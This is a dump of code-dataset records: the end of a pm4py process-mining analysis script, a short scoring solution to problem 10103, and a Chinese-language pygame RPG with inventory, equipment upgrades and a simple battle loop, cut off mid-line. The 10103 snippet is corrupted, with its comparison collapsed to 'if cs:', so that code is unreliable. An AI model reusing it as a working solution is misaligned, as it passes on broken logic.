from the dictionary for the later comparison\n for key, value in variants_scores.items():\n if value == performance_drop_value:\n del variants_scores[key]\n break\n\n return {0: performance_drop_value, \"values\": list(variants_scores.values())}\n\nperformance_drop = performance_analysis(variants)\n\n#Filter most common variants\nfiltered_log = variants_filter.filter_log_variants_percentage(event_log, percentage=0.5)\n# print(len(filtered_log))\n\nvariants_filtered = variants_filter.get_variants(filtered_log)\n# print(len(variants_filtered))\n\nperformance_analysis(variants_filtered)\nprint()\n\n## Point 6\nfor n in range(50):\n i = randint(0, len(performance_drop[\"values\"])-1)\n z = (performance_drop[0] - performance_drop[\"values\"][i])/sqrt(performance_drop[0] + performance_drop[\"values\"][i])\n if z > 1.96:\n print(\"Comparing most performance drop variant with variant number {} differences are significantly important\".format(i+1))\n\n## Point 7\n# from pm4py.algo.discovery.dfg import algorithm as dfg_discovery\n# dfg = dfg_discovery.apply(event_log)\n\n# from pm4py.visualization.dfg import visualizer as dfg_visualization\n# dfg = dfg_discovery.apply(event_log, variant=dfg_discovery.Variants.PERFORMANCE)\n# parameters = {dfg_visualization.Variants.PERFORMANCE.value.Parameters.FORMAT: \"png\"}\n# gviz = dfg_visualization.apply(dfg, log=event_log, variant=dfg_visualization.Variants.PERFORMANCE, parameters=parameters)\n# dfg_visualization.save(gviz, 
\"dfg.png\")","repo_name":"Davydhh/Zucchetti-Process-Mining","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3114482687","text":"n=int(input())\r\nscore_c = score_s = 100\r\n\r\nfor _ in range(n):\r\n c,s= map(int, input().split(' '))\r\n if cs:\r\n score_s-=c\r\n else: continue\r\n \r\n\r\nprint(score_c)\r\nprint(score_s)\r\n","repo_name":"uranusneo/2021PS","sub_path":"10103.py","file_name":"10103.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"69805922333","text":"import pygame\nimport time\nimport sys\nimport json\nimport os\nimport re\nimport random\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREY = 128, 128, 128\nCREAM = 230, 230, 230\nYELLOW = 255, 255, 0\nsize = width, height = 1100, 800 # size of the window\nfps = 300 # frames per second for game\npath = os.getcwd()\nfiles = os.listdir(path)\n\npygame.init()\nscreen = pygame.display.set_mode(size)\nfclock = pygame.time.Clock()\n\nfont = pygame.font.Font(\"ShenYunSuXinTi-2.ttf\", 32)\nfont_small = pygame.font.Font(\"ShenYunSuXinTi-2.ttf\", 20)\nicon = pygame.image.load(\"./image/icon.png\")\npygame.display.set_icon(icon)\ncharacter_images = pygame.image.load(\"./image/角色.png\")\ncharacter_image = character_images.get_rect()\ncharacter_image = character_image.move(width - 60, height - 60)\nbag_images = pygame.image.load(\"./image/背包.png\")\nbag_image = bag_images.get_rect()\nbag_image = bag_image.move(width - 120, height - 60)\nachievement_images = pygame.image.load(\"./image/成就.png\")\nachievement_image = achievement_images.get_rect()\nachievement_image = achievement_image.move(width - 180, height - 60)\nstrengthen_images = pygame.image.load(\"./image/强化.png\")\nstrengthen_image = strengthen_images.get_rect()\nstrengthen_image = strengthen_image.move(width / 2 - 90, 100)\nsale_images = pygame.image.load(\"./image/出售.png\")\nsale_image = sale_images.get_rect()\nsale_image = sale_image.move((width - 200) / 3 - 140, 100)\nenchant_images = pygame.image.load(\"./image/附魔.png\")\nenchant_image = enchant_images.get_rect()\nenchant_image = enchant_image.move((width - 200) / 1.5 + 160, 100)\nshoe_images = pygame.image.load(\"./image/鞋子.png\")\nsword_images = pygame.image.load(\"./image/剑.png\")\nhelmet_images = pygame.image.load(\"./image/头盔.png\")\nring_images = pygame.image.load(\"./image/戒指.png\")\narmor_images = pygame.image.load(\"./image/护甲.png\")\nwand_images = pygame.image.load(\"./image/法杖.png\")\nbow_images = pygame.image.load(\"./image/弓箭.png\")\ntitle_images = pygame.image.load(\"./image/称号.png\")\nbig_health_images = pygame.image.load(\"./image/大红药.png\")\nsmall_health_images = pygame.image.load(\"./image/小红药.png\")\nbig_magic_images = pygame.image.load(\"./image/大蓝药.png\")\nsmall_magic_images = pygame.image.load(\"./image/小蓝药.png\")\nbig_attack_images = pygame.image.load(\"./image/攻击药剂(大).png\")\nsmall_attack_images = pygame.image.load(\"./image/攻击药剂(小).png\")\nenchant_material_images = pygame.image.load(\"./image/附魔材料.png\")\nvocational_material_images = pygame.image.load(\"./image/职业材料.png\")\nmission_material_images = pygame.image.load(\"./image/任务材料.png\")\npygame.display.set_caption(\"无名之地\")\n\n\nclass Material:\n def __init__(self, name):\n self.name = name\n\n def create_new_material(self, attack, defence, health, magic, critical, speed, luck, num, value, type):\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.num = num\n self.value = value\n self.type = type\n\n\nclass Baggage:\n def __init__(self, capacity):\n self.capacity = capacity\n self.objects = []\n self.amount = 0\n\n\nclass Prop:\n def __init__(self, name):\n self.name = name\n\n def create_new_prop(self, attack, defence, health, magic, critical, speed, luck, grow_attack, grow_defence,\n grow_health, grow_magic, grow_critical, grow_speed, grow_luck, value, pos, level=1,\n exp=0, need_exp=10, enchant_time=5, is_wear=0, numb=1):\n \"\"\"numb 表示此装备的序列号\"\"\"\n 
\"\"\"-1 = 法杖, 1 = 剑, 0 = 弓箭, 2 = helmet, 3 = armor, 4 = shoes, 5 = ornament, 6 = title\"\"\"\n # is_wear = 0,1,2,3 0 for not wearing, 1,2,3 for character 1, 2, 3\n self.level = level\n self.exp = exp\n self.need_exp = need_exp\n self.pos = pos\n self.enchant_time = enchant_time # 剩余的附魔次数\n self.grow_attack = grow_attack\n self.grow_defence = grow_defence\n self.grow_health = grow_health\n self.grow_magic = grow_magic\n self.grow_critical = grow_critical\n self.grow_speed = grow_speed\n self.grow_luck = grow_luck\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.is_wear = is_wear\n self.value = value\n self.numb = numb\n\n def up_level(self, exp):\n self.exp += exp\n while self.exp >= self.need_exp:\n self.value += self.need_exp//2\n self.level += 1\n self.exp = self.exp - self.need_exp\n self.need_exp *= 2\n self.attack += self.grow_attack\n self.defence += self.grow_defence\n self.health += self.grow_health\n self.magic += self.grow_magic\n self.critical += self.grow_critical\n self.speed += self.grow_speed\n self.luck += self.grow_luck\n\n\nclass Drug:\n def __init__(self, name):\n self.name = name\n\n def create_new_drug(self, attack, defence, health, speed, magic, num, value):\n self.num = num\n self.attack = attack\n self.defence = defence\n self.health = health\n self.speed = speed\n self.magic = magic\n self.value = value\n\n\nclass Character:\n def __init__(self, name):\n self.name = name\n\n def create_new_character(self, attack, defence, health, magic, critical, speed, luck, insight, grow_attack,\n grow_defence, grow_health, grow_magic, grow_critical, grow_speed, grow_luck, grow_insight,\n level=1, exp=0, need_exp=10, position=[]):\n self.level = level\n self.exp = exp\n self.need_exp = need_exp\n self.position = position\n self.grow_attack = grow_attack\n self.grow_defence = grow_defence\n self.grow_health = grow_health\n self.grow_magic = grow_magic\n self.grow_critical = grow_critical\n self.grow_speed = grow_speed\n self.grow_luck = grow_luck\n self.grow_insight = grow_insight\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.insight = insight\n\n def up_level(self, exp):\n self.exp += exp\n while self.exp >= self.need_exp:\n self.level += 1\n self.exp = self.exp - self.need_exp\n self.need_exp *= 2\n self.attack += self.grow_attack\n self.defence += self.grow_defence\n self.health += self.grow_health\n self.magic += self.grow_magic\n self.critical += self.grow_critical\n self.speed += self.grow_speed\n self.luck += self.grow_luck\n self.insight += self.grow_insight\n\n def character_cur_ability(self):\n \"\"\"set cur_ability\"\"\"\n self.cur_attack = self.attack\n self.cur_defence = self.defence\n self.cur_health = self.health\n self.cur_speed = self.speed\n self.cur_magic = self.magic\n self.cur_critical = self.critical\n\n\ndef load_file():\n \"\"\"存档读取\"\"\"\n if not os.path.exists('fileSave.json'):\n with open('fileSave.json', 'a') as f:\n characters = []\n drug = []\n props = []\n materials = []\n dic = {'plot': 0, 'money': 0, 'characters': characters, 'drug': drug, 'props': props, 'materials': materials}\n dic = json.dumps(dic, indent=4, ensure_ascii=False)\n f.write(dic)\n with open('fileSave.json', 'r', encoding='utf-8') as file_object:\n contents = json.load(file_object)\n return contents\n\n\ndef down_file(contents):\n 
\"\"\"保存存档\"\"\"\n contents = json.dumps(contents, indent=4, ensure_ascii=False)\n with open('fileSave.json', 'w', encoding='utf-8') as file_object:\n \"\"\"覆盖原存档\"\"\"\n file_object.write(contents)\n\n\ndef make_lists(contents, props_list, drug_list, characters_list, materials_list):\n \"\"\"存档变列表\"\"\"\n for j in contents['characters']:\n ch = Character(j['name'])\n ch_prop = []\n for i in j['position']:\n prop = Prop(i['name'])\n prop.create_new_prop(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'],\n i['grow_attack'], i['grow_defence'], i['grow_health'], i['grow_magic'],\n i['grow_critical'],\n i['grow_speed'], i['grow_luck'], i['value'], i['pos'], i['level'], i['exp'],\n i['need_exp'], i['enchant_time'], i['is_wear'], i['numb'])\n ch_prop.append(prop)\n ch.create_new_character(j['attack'], j['defence'], j['health'], j['magic'], j['critical'], j['speed'],\n j['luck'], j['insight'], j['grow_attack'], j['grow_defence'], j['grow_health'],\n j['grow_magic'], j['grow_critical'], j['grow_speed'], j['grow_luck'], j['grow_insight'],\n j['level'], j['exp'], j['need_exp'], ch_prop)\n characters_list.append(ch)\n for i in contents['props']:\n prop = Prop(i['name'])\n prop.create_new_prop(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'], i['luck'],\n i['grow_attack'], i['grow_defence'], i['grow_health'], i['grow_magic'], i['grow_critical'],\n i['grow_speed'], i['grow_luck'], i['value'], i['pos'], i['level'], i['exp'],\n i['need_exp'], i['enchant_time'], i['is_wear'], i['numb'])\n props_list.append(prop)\n for i in contents['drug']:\n drug = Drug(i['name'])\n drug.create_new_drug(i['attack'], i['defence'], i['health'], i['speed'], i['magic'], i['num'], i['value'])\n drug_list.append(drug)\n for i in contents['materials']:\n material = Material(i['name'])\n material.create_new_material(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'], i['num'], i['value'], i['type'])\n materials_list.append(material)\n\n\ndef show_lines(lines, t):\n for i in range(len(lines)):\n texts = font.render(lines[i], True, BLACK)\n text = texts.get_rect()\n text.center = (width/2, 100 + i*200)\n screen.blit(texts, text)\n pygame.display.update() # watch out its position\n time.sleep(t)\n\n\ndef show_words(words, coord, font, color):\n texts = font.render(words, True, color)\n text = texts.get_rect()\n text.center = (coord[0], coord[1])\n screen.blit(texts, text)\n\n\ndef show_attr(character, coord):\n show_words('经验:' + str(character.exp) + '/' + str(character.need_exp), (coord[0] + 72, coord[1]), font, BLACK)\n show_words('攻击:' + str(character.attack), (coord[0], coord[1] + 50), font, BLACK)\n show_words('防御:' + str(character.defence), (coord[0] + 145, coord[1] + 50), font, BLACK)\n show_words('生命:' + str(character.health), (coord[0], coord[1] + 100), font, BLACK)\n show_words('魔法:' + str(character.magic), (coord[0] + 145, coord[1] + 100), font, BLACK)\n show_words('暴击:' + str(character.critical), (coord[0], coord[1] + 150), font, BLACK)\n show_words('速度:' + str(character.speed), (coord[0] + 145, coord[1] + 150), font, BLACK)\n show_words('幸运:' + str(character.luck), (coord[0], coord[1] + 200), font, BLACK)\n show_words('洞视:' + str(character.insight), (coord[0] + 145, coord[1] + 200), font, BLACK)\n show_words('等级:' + str(character.level), (coord[0], coord[1] + 250), font, BLACK)\n\n\ndef refresh_lists(baggage, props_list, drug_list, materials_list):\n \"\"\"背包存入列表\"\"\"\n props_list.clear()\n drug_list.clear()\n 
materials_list.clear()\n for i in baggage.objects:\n if Prop == type(i):\n props_list.append(i)\n elif Drug == type(i):\n drug_list.append(i)\n elif Material == type(i):\n materials_list.append(i)\n\n\ndef refresh_content(contents, characters_list, props_list, drug_list, materials_list):\n \"\"\"列表变存档\"\"\"\n contents['characters'].clear()\n contents['drug'].clear()\n contents['props'].clear()\n contents['materials'].clear()\n for i in characters_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'critical': i.critical, 'speed': i.speed, 'luck': i.luck,\n 'insight': i.insight, 'level': i.level, 'exp': i.exp, 'need_exp': i.need_exp,\n 'grow_attack': i.grow_attack, 'grow_defence': i.grow_defence, 'grow_health': i.grow_health,\n 'grow_magic': i.grow_magic, 'grow_critical': i.grow_critical, 'grow_speed': i.grow_speed,\n 'grow_luck': i.grow_luck, 'grow_insight': i.grow_insight, 'position': i.position}\n prop_dic = []\n for j in dic['position']:\n prop = {'name': j.name, 'attack': j.attack, 'defence': j.defence, 'health': j.health, 'magic': j.magic,\n 'critical': j.critical, 'speed': j.speed, 'luck': j.luck, 'level': j.level,'exp': j.exp,\n 'need_exp': j.need_exp, 'grow_attack': j.grow_attack, 'grow_defence': j.grow_defence,\n 'grow_health': j.grow_health, 'grow_magic': j.grow_magic, 'grow_critical': j.grow_critical,\n 'grow_speed': j.grow_speed, 'grow_luck': j.grow_luck, 'pos': j.pos, 'value': j.value,\n 'is_wear': j.is_wear, 'enchant_time': j.enchant_time, 'numb': j.numb}\n prop_dic.append(prop)\n dic['position'] = prop_dic\n content['characters'].append(dic)\n for i in drug_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'speed': i.speed, 'value': i.value, 'num': i.num}\n content['drug'].append(dic)\n for i in props_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'critical': i.critical, 'speed': i.speed, 'luck': i.luck, 'level': i.level,\n 'exp': i.exp, 'need_exp': i.need_exp, 'grow_attack': i.grow_attack, 'grow_defence': i.grow_defence,\n 'grow_health': i.grow_health, 'grow_magic': i.grow_magic, 'grow_critical': i.grow_critical,\n 'grow_speed': i.grow_speed, 'grow_luck': i.grow_luck, 'pos': i.pos, 'value': i.value,\n 'is_wear': i.is_wear, 'enchant_time': i.enchant_time, 'numb': i.numb}\n content['props'].append(dic)\n for i in materials_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health, 'critical': i.critical,\n 'magic': i.magic, 'speed': i.speed, 'value': i.value, 'num': i.num, 'luck': i.luck, 'type': i.type}\n content['materials'].append(dic)\n\n\ndef add_prop_character(character, prop, num):\n \"\"\"人物装备道具\"\"\"\n character.attack += prop.attack\n character.defence += prop.defence\n character.health += prop.health\n character.magic += prop.magic\n character.critical += prop.critical\n character.luck += prop.luck\n character.speed += prop.speed\n for i in character.position:\n if prop.pos <= 1:\n if i.pos <= 1:\n remove_prop_character(character, i)\n break\n else:\n if i.pos == prop.pos:\n remove_prop_character(character, i)\n break\n if prop.is_wear != 0:\n remove_prop_character(character_list[prop.is_wear-1], prop)\n character.position.append(prop)\n prop.is_wear = num\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.is_wear = prop.is_wear\n for i in character_list:\n if i.name == character.name:\n i.position = character.position\n 
refresh_baggage(baggage, prop_list, drug_list, material_list)\n\n\ndef remove_prop_character(character, prop):\n \"\"\"移除装备\"\"\"\n for i in character.position:\n if i.name == prop.name:\n character.position.remove(i)\n prop.is_wear = 0\n for i in character_list:\n if i.name == character.name:\n i.position = character.position\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.is_wear = 0\n character.attack -= prop.attack\n character.defence -= prop.defence\n character.health -= prop.health\n character.magic -= prop.magic\n character.critical -= prop.critical\n character.luck -= prop.luck\n character.speed -= prop.speed\n\n\ndef strengthen_prop(prop):\n \"\"\"强化装备\"\"\"\n level = prop.level\n chance = 100 - ((level - 1) * 10)\n if level == 10:\n return 2 # 2 for out of range\n if content['money'] < baggage.objects[chose_num].need_exp:\n return 3 # 3 for lack of money\n content['money'] -= baggage.objects[chose_num].need_exp\n rand = random.randint(1, 100)\n if rand <= chance:\n prop.up_level(prop.need_exp)\n if prop.is_wear != 0:\n for i in character_list[prop.is_wear - 1].position:\n if i.name == prop.name and i.numb == prop.numb:\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n i.level = prop.level\n i.need_exp = prop.need_exp\n i.exp = prop.exp\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n i.level = prop.level\n i.need_exp = prop.need_exp\n i.exp = prop.exp\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n return 1 # 1 for success\n else:\n return 0 # 0 for fail\n\n\ndef enchant_prop(prop, material):\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.enchant_time -= 1\n i.attack += material.attack\n i.defence += material.defence\n i.health += material.health\n i.magic += material.magic\n i.critical += material.critical\n i.speed += material.speed\n i.luck += material.luck\n i.value += material.value // 2\n if prop.is_wear != 0:\n for i in character_list[prop.is_wear - 1].position:\n if i.name == prop.name and i.numb == prop.numb:\n i.enchant_time = prop.enchant_time\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n\n\ndef is_new(contents):\n new = contents[\"plot\"]\n plot_1 = [\"一觉醒来,你不知道自己身处何处,\", \"甚至自己是何许人也亦无从得知,世界犹如混沌般恍惚。\", \"徘徊于这谜一般的大陆上,你决定只身探索,寻找真相......\"]\n if new == 0:\n contents[\"plot\"] = 1\n \"\"\"测试为0,实际为1\"\"\"\n screen.fill(CREAM)\n show_lines(plot_1, 2)\n pygame.display.update()\n fclock.tick(fps)\n down_file(contents)\n\n\ndef draw_window():\n pygame.draw.rect(screen, BLACK, (100, 50, width - 200, height - 200), 4)\n \"\"\"rect stand for (x,y,width,height)\"\"\"\n pygame.draw.rect(screen, BLACK, (width - 130, 50, 30, 30), 4)\n pygame.draw.line(screen, RED, (width - 125, 55), (width - 105, 75), 4)\n pygame.draw.line(screen, RED, (width - 105, 55), (width - 125, 75), 4)\n pygame.display.update()\n fclock.tick(fps)\n\n\ndef close_window():\n mouse_pos = 
pygame.mouse.get_pos()\n mouse_pressed = pygame.mouse.get_pressed()\n for event in pygame.event.get(): # magic move\n if event.type == pygame.QUIT: # close the window\n content['baggage'] = baggage.amount # put into fileSave\n refresh_content(content, character_list, prop_list, drug_list, material_list)\n down_file(content)\n sys.exit()\n if width - 130 < mouse_pos[0] < width - 100 and 50 < mouse_pos[1] < 80 and mouse_pressed[0] == 1:\n return 1\n\n\ndef show_image(item_list_image, coord, id, num):\n dic = {'-1': wand_images, '0': bow_images, '1': sword_images, '2': helmet_images, '3': armor_images,\n '4': shoe_images, '5': ring_images, '6': title_images, '大红药': big_health_images,\n '小红药': small_health_images, '大蓝药': big_magic_images, '小蓝药': small_magic_images,\n '小攻击药': small_attack_images, '大攻击药': big_attack_images, '附魔材料': enchant_material_images,\n '职业材料': vocational_material_images, '任务材料': mission_material_images}\n item_list_image.append(dic[id].get_rect())\n item_list_image[num] = item_list_image[num].move(coord)\n screen.blit(dic[id], item_list_image[num])\n return item_list_image\n\n\ndef show_object(baggage):\n item_list_image = []\n j = 0\n for i in baggage.objects:\n coord = j % 6 * 150 + 150, j // 6 * 150 + 70\n if type(i) == Prop:\n item_list_image = show_image(item_list_image, coord, str(i.pos), j)\n if i.is_wear > 0:\n pygame.draw.line(screen, RED, (j % 6 * 150 + 115, j // 6 * 150 + 65), (j % 6 * 150 + 125, j // 6 * 150\n + 75), 4)\n pygame.draw.line(screen, RED, (j % 6 * 150 + 125, j // 6 * 150 + 75), (j % 6 * 150 + 145, j // 6 * 150\n + 55), 4)\n show_words(str(character_list[i.is_wear - 1].name),\n (j % 6 * 150 + 190, j // 6 * 150 + 60), font_small, GREY)\n elif type(i) == Drug:\n item_list_image = show_image(item_list_image, coord, str(i.name), j)\n elif type(i) == Material:\n '''change into upper form'''\n item_list_image = show_image(item_list_image, coord, str(i.type), j)\n show_words(i.name, (j % 6 * 150 + 180, j // 6 * 150 + 150), font, BLACK)\n j += 1\n return len(item_list_image)\n\n\ndef click_on_props():\n mouse_pos = pygame.mouse.get_pos()\n for i in range(4):\n if 100 < mouse_pos[0] < width - 100 and 50 + i * 150 < mouse_pos[1] < 200 + i * 150:\n for j in range(6):\n if 100 + j * 150 < mouse_pos[0] < 250 + j * 150:\n return i * 6 + j\n return -1\n\n\ndef translate(word):\n translator = {'name': '名称', 'attack': '攻击', 'defence': '防御', 'health': '生命', 'magic': '魔法', 'critical': '暴击',\n 'speed': '速度', 'luck': '幸运', 'level': '等级', 'num': '数量', 'enchant_time': '可附魔次数',\n 'value': '价格', 'type': '类型'}\n return translator[word]\n\n\ndef sale_obj(baggage, obj, contents):\n \"\"\"Sell an item: add its value to the money and remove it from the baggage\"\"\"\n contents['money'] += obj.value\n if Prop == type(obj):\n baggage.objects.remove(obj)\n else:\n for i in baggage.objects:\n if i.name == obj.name:\n i.num -= 1\n if i.num <= 0:\n baggage.objects.remove(i)\n baggage.amount -= 1\n break\n\n\ndef draw_character():\n pygame.draw.line(screen, GREY, (100, height / 2 - 50), (width - 100, height / 2 - 50), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 3 + 100, 50), ((width - 200) / 3 + 100, height - 150), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 1.5 + 105, 50), ((width - 200) / 1.5 + 105, height - 150), 4)\n show_words(character_list[0].name, ((width - 200) / 6 + 100, 100), font, BLACK)\n show_words(character_list[1].name, ((width - 200) / 2 + 100, 100), font, BLACK)\n show_words(character_list[2].name, ((width - 200) / 6 * 5 + 100, 100), font, BLACK)\n show_attr(character_list[0], ((width - 200) / 6 + 20, height / 2 - 20))\n show_attr(character_list[1], ((width - 200) / 2 + 20, height / 2 - 20))\n show_attr(character_list[2], ((width - 200) / 6 * 5 + 20, height / 2 - 20))\n for i in range(6):\n pygame.draw.rect(screen, GREY, (((width - 200) / 6 - 40 + 97 * (i % 3), 240 if i > 2 else 130), (85, 85)), 4)\n pygame.draw.rect(screen, GREY, (((width - 200) / 2 - 35 + 97 * (i % 3), 240 if i > 2 else 130), (85, 85)), 4)\n pygame.draw.rect(screen, GREY, (((width - 200) / 6 * 5 - 35 + 97 * (i % 3),\n 240 if i > 2 else 130), (85, 85)), 4)\n item_list_image = []\n k = 0\n for i in range(3):\n for j in range(6):\n if j < len(character_list[i].position):\n coord = (width - 200) / 6 - 25 + 97 * (j % 3) + 308 * i - (i // 2) * 8, 250 if j > 2 else 140\n item_list_image = show_image(item_list_image, coord, str(character_list[i].position[j].pos), k)\n show_words(str(character_list[i].position[j].name),\n ((width - 200) / 6 + 97 * (j % 3) + i * 300, 340 if j > 2 else 230),\n font_small, RED)\n k += 1\n draw_window()\n\n\ndef draw_map():\n for point in point_list:\n pygame.draw.circle(screen, YELLOW, point, 15, 4)\n\n\ndef level_choose():\n i = 0\n for point in point_list:\n if point[0] - 25 < map_choice[0] < point[0] + 25 and point[1] - 25 < map_choice[1] < point[1] + 25:\n pygame.draw.circle(screen, RED, point, 15, 4)\n return i\n i += 1\n return -1\n\n\ndef refresh_baggage(baggage, props_list, drug_list, materials_list):\n \"\"\"Load the item lists into the baggage\"\"\"\n baggage.objects = props_list[:] + drug_list[:] + materials_list[:]\n baggage.amount = len(baggage.objects)\n\n\ndef get_cur_ability(fight_event):\n \"\"\"Initialize current abilities for the combatants of the chosen fight\"\"\"\n with open('fileSave.json', 'r', encoding='utf-8') as file_object:\n contents = json.load(file_object)\n for j in contents['fight_event']:\n if j['num'] == fight_event:\n for i in j['enemy']:\n ch = Character(i['name'])\n ch.create_new_character(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [])\n enemy_list.append(ch)\n for i in characters_fight_list:\n i.character_cur_ability()\n for i in enemy_list:\n i.character_cur_ability()\n\n\ndef judge_speed():\n \"\"\"Sort living combatants by speed, fastest first\"\"\"\n speed_list = []\n for i in characters_fight_list:\n if i.cur_health > 0:\n speed_list.append(i)\n for i in enemy_list:\n if i.cur_health > 0:\n speed_list.append(i)\n for i in range(0, len(speed_list)-1):\n for j in range(i+1, len(speed_list)):\n if speed_list[i].cur_speed < speed_list[j].cur_speed:\n speed_list[i], speed_list[j] = speed_list[j], speed_list[i]\n return speed_list\n\n\ndef character_action(character1, character2):\n harm = round(0.8 * character1.cur_attack - character2.cur_defence) + round(0.2 * character1.cur_attack)\\\n if character1.cur_attack > character2.cur_defence else round(0.2 * character1.cur_attack)\n if character1.cur_critical >= random.randint(1, 100):\n print(\"暴击!!!\")\n harm = round(character1.cur_attack * 1.5) - character2.cur_defence\n if harm <= 0:\n harm = 0\n character2.cur_health -= harm\n print(character1.name + '对' + character2.name + '造成了' + str(harm) + '点伤害。')\n\n\ndef character_die(character, char_list):\n char_list.remove(character)\n\n\ndef fight_end():\n if len(characters_fight_list) == 0 or len(enemy_list) == 0:\n return True\n return False\n\n\ndef fight_fight():\n \"\"\"Simulated battle: the main fight loop\"\"\"\n while not fight_end():\n # refresh the action order for this round\n speed_list = judge_speed()\n for i in speed_list:\n if i.cur_health > 0 and not fight_end():\n if i in characters_fight_list:\n if len(enemy_list) > 1:\n character = enemy_list[random.randint(0, len(enemy_list) - 1)]\n else:\n character = enemy_list[-1]\n character_action(i, character)\n # only the basic attack action is implemented so far\n print(character.name + 'health' + str(character.cur_health))\n if character.cur_health <= 0:\n character_die(character, enemy_list)\n speed_list.remove(character)\n else:\n if len(characters_fight_list) > 1:\n character = characters_fight_list[random.randint(0, len(characters_fight_list) - 1)]\n else:\n character = characters_fight_list[-1]\n character_action(i, character)\n print(character.name + 'health' + str(character.cur_health))\n if character.cur_health <= 0:\n character_die(character, characters_fight_list)\n speed_list.remove(character)\n\n\ncontent = load_file()\nbaggage = Baggage(content['baggage'])\nis_new(content)\ncharacter_list = []\ndrug_list = []\nmaterial_list = []\nprop_list = []\nmake_lists(content, prop_list, drug_list, character_list, material_list)\nrefresh_baggage(baggage, prop_list, drug_list, material_list)\nmap_choice = [20, height - 20]\nmap_x_velocity = 0\nmap_y_velocity = 0\nflag = 0\npoint_list = [(100, 200), [200, 100], [300, 400], [500, 400]]\nlevel_choice = -1\n\nwhile True:\n screen.fill(CREAM)\n for event in pygame.event.get(): # event list\n if event.type == pygame.QUIT: # close the window\n refresh_content(content, character_list, prop_list, drug_list, material_list)\n down_file(content)\n sys.exit()\n elif event.type == pygame.KEYDOWN: # event of press the key\n if event.key == pygame.K_RIGHT:\n map_x_velocity = 2\n if event.key == pygame.K_DOWN:\n map_y_velocity = 2\n if event.key == pygame.K_LEFT:\n map_x_velocity = -2\n if event.key == pygame.K_UP:\n map_y_velocity = -2\n elif event.type == pygame.KEYUP: # event of release the key\n if event.key == pygame.K_RIGHT:\n map_x_velocity = 0\n if event.key == pygame.K_DOWN:\n map_y_velocity = 0\n if event.key == pygame.K_LEFT:\n map_x_velocity = 0\n if event.key == pygame.K_UP:\n map_y_velocity = 0\n if event.key == pygame.K_SPACE and level_choice != -1:\n print(int(level_choice))\n characters_fight_list = character_list[:]\n enemy_list = []\n get_cur_ability(level_choice)\n fight_fight()\n print(int(level_choice))\n mouse_pos = pygame.mouse.get_pos()\n mouse_pressed = pygame.mouse.get_pressed()\n '''get_pressed() returns a tuple: [0] is the left button, [1] the middle, [2] the right'''\n if width - 60 < mouse_pos[0] < width and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1:\n '''character'''\n draw_character()\n draw_window()\n while True:\n if close_window() == 1:\n break\n if (width - 120 < mouse_pos[0] < width - 60 and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1)\\\n or flag == 1:\n \"\"\"bag\"\"\"\n show_words(\"金钱:\" + str(content['money']), (width / 2, 30), font, BLACK)\n for i in range(3):\n pygame.draw.line(screen, BLACK, (100, 200 + i * 150), (width - 100, 200 + i * 150), 4)\n for i in range(5):\n pygame.draw.line(screen, BLACK, (250 + i * 150, 50), (250 + i * 150, height - 150), 4)\n ''' put into function'''\n props_num = show_object(baggage)\n draw_window()\n flag = 0\n while True:\n if close_window() == 1:\n refresh_lists(baggage, prop_list, drug_list, material_list)\n break\n mouse_pressed = pygame.mouse.get_pressed()\n cur_word_1 = ''\n cur_word_2 = ''\n tag = 0\n if mouse_pressed[0] == 1:\n chose_num = click_on_props()\n if 0 <= chose_num < props_num:\n pygame.draw.rect(screen, CREAM, ((0, height - 145), (1100, 145)))\n word_len = 0\n obj = vars(baggage.objects[chose_num])\n for i in obj:\n if not re.findall('(^grow|^need|pos|exp|is_wear|numb)', str(i)):\n if obj[i] != 0:\n if word_len < 6:\n cur_word_1 += translate(str(i)) + ':' + str(obj[i]) + ' '\n word_len += 1\n else:\n cur_word_2 += translate(str(i)) + ':' + str(obj[i]) + ' '\n show_words(cur_word_1, (width / 2, height - 120), font, BLACK)\n show_words(cur_word_2, (width / 2, height - 70), font, BLACK)\n elif mouse_pressed[2] == 1:\n chose_num = 